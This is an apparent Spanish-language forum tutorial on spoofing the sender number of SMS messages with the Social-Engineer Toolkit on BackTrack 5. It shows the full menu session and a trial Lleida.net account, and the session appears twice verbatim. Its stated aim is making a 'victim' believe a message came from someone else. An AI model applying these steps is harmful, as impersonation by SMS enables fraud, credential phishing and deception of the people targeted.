Hola, os dejo este tutorial de sms spoofing con BackTrack5
En el explico como enviar un mensaje de texto(sms) a una víctima con el numero de teléfono que nosotros queramos.
En la prueba que yo hice me envié un mensaje a mi teléfono como si me lo fuese mandado un amigo.
Otro ej: Le mandas un mensaje a tu padre y a el le saldrá que se lo envía tu madre.
Primera parte: Muy importante para que funcione:
-Hazte una cuenta gratuita de prueba en Lleida.net y te mandaran un usuario y una contraseña a tu email para enviar un total de 20 mensajes de este tipo.
Segunda parte: Pasamos a la acción.
-arrancamos el SET con este comando: #/pentest/exploits/set/set
*****************************************************************************
.--. .--. .-----.
: .--': .--'`-. .-'
`. `. : `; : :
_`, :: :__ : :
`.__.'`.__.' :_;
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Development Team: JR DePre (pr1me) [---]
[---] Development Team: Joey Furr (j0fer) [---]
[---] Development Team: Thomas Werth [---]
[---] Development Team: Garland [---]
[---] Version: 3.4.1 [---]
[---] Codename: 'A New Beginning' [---]
[---] Report bugs: davek@trustedsec.com [---]
[---] Follow me on Twitter: dave_rel1k [---]
[---] Homepage: https://www.trustedsec.com [---]
Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..
Join us on irc.freenode.net in channel #setoolkit
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
set> 7
The SMS module allows you to specially craft SMS messages and send them
to a person. You can spoof the SMS source.
This module was created by the team at TB-Security.com.
You can use a predefined template, create your own template or specify
an arbitrary message. The main method for this would be to get a user to
click or coax them on a link in their browser and steal credentials or
perform other attack vectors.
1) Perform a SMS Spoofing Attack
2) Create a Social-Engineering Template
99) Return to Main Menu
set:sms>1
SMS Attack Menu
There are diferent attacks you can launch in the context of SMS spoofing,
select your own.
1. SMS Attack Single Phone Number
2. SMS Attack Mass SMS
99. Return to SMS Spoofing Menu
set> 1
Single SMS Attack
set:sms> Send sms to:+34(numero receptor del sms)
1. Pre-Defined Template
2. One-Time Use SMS
99. Cancel and return to SMS Spoofing Menu
set:sms> Use a predefined template or craft a one time SMS?:2
set:sms> Source number phone:+34(numero qe supuestamente envia el sms)
set:sms> Body of the message, hit return for a new line. Control+c when finished:cabecera
Next line of the body: eyy tiooo
Next line of the body: aver si nos
Next line of the body: echamos pronto
Next line of the body: un pokkker
Next line of the body: de esos buenos^C
Service Selection
There are diferent services you can use for the SMS spoofing, select
your own.
1. SohoOS (buggy)
2. Lleida.net (pay)
3. SMSGANG (pay)
4. Android Emulator (need to install Android Emulator)
99. Cancel and return to SMS Spoofing Menu
set:sms>2
set:sms> Your Lleida.net user:USUARIO
set:sms> Your Lleida.net password:PASSWORD
set:sms> Email for the receipt (optional):NO LO RECOMIENDO
SMS sent
En el explico como enviar un mensaje de texto(sms) a una víctima con el numero de teléfono que nosotros queramos.
En la prueba que yo hice me envié un mensaje a mi teléfono como si me lo fuese mandado un amigo.
Otro ej: Le mandas un mensaje a tu padre y a el le saldrá que se lo envía tu madre.
Primera parte: Muy importante para que funcione:
-Hazte una cuenta gratuita de prueba en Lleida.net y te mandaran un usuario y una contraseña a tu email para enviar un total de 20 mensajes de este tipo.
Segunda parte: Pasamos a la acción.
-arrancamos el SET con este comando: #/pentest/exploits/set/set
*****************************************************************************
.--. .--. .-----.
: .--': .--'`-. .-'
`. `. : `; : :
_`, :: :__ : :
`.__.'`.__.' :_;
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Development Team: JR DePre (pr1me) [---]
[---] Development Team: Joey Furr (j0fer) [---]
[---] Development Team: Thomas Werth [---]
[---] Development Team: Garland [---]
[---] Version: 3.4.1 [---]
[---] Codename: 'A New Beginning' [---]
[---] Report bugs: davek@trustedsec.com [---]
[---] Follow me on Twitter: dave_rel1k [---]
[---] Homepage: https://www.trustedsec.com [---]
Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..
Join us on irc.freenode.net in channel #setoolkit
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
set> 7
The SMS module allows you to specially craft SMS messages and send them
to a person. You can spoof the SMS source.
This module was created by the team at TB-Security.com.
You can use a predefined template, create your own template or specify
an arbitrary message. The main method for this would be to get a user to
click or coax them on a link in their browser and steal credentials or
perform other attack vectors.
1) Perform a SMS Spoofing Attack
2) Create a Social-Engineering Template
99) Return to Main Menu
set:sms>1
SMS Attack Menu
There are diferent attacks you can launch in the context of SMS spoofing,
select your own.
1. SMS Attack Single Phone Number
2. SMS Attack Mass SMS
99. Return to SMS Spoofing Menu
set> 1
Single SMS Attack
set:sms> Send sms to:+34(numero receptor del sms)
1. Pre-Defined Template
2. One-Time Use SMS
99. Cancel and return to SMS Spoofing Menu
set:sms> Use a predefined template or craft a one time SMS?:2
set:sms> Source number phone:+34(numero qe supuestamente envia el sms)
set:sms> Body of the message, hit return for a new line. Control+c when finished:cabecera
Next line of the body: eyy tiooo
Next line of the body: aver si nos
Next line of the body: echamos pronto
Next line of the body: un pokkker
Next line of the body: de esos buenos^C
Service Selection
There are diferent services you can use for the SMS spoofing, select
your own.
1. SohoOS (buggy)
2. Lleida.net (pay)
3. SMSGANG (pay)
4. Android Emulator (need to install Android Emulator)
99. Cancel and return to SMS Spoofing Menu
set:sms>2
set:sms> Your Lleida.net user:USUARIO
set:sms> Your Lleida.net password:PASSWORD
set:sms> Email for the receipt (optional):NO LO RECOMIENDO
SMS sent
- SET has completed!
Press <return> to continue
FIN!!!!
Espero que os alla gusstado, estare atento a las preguntas.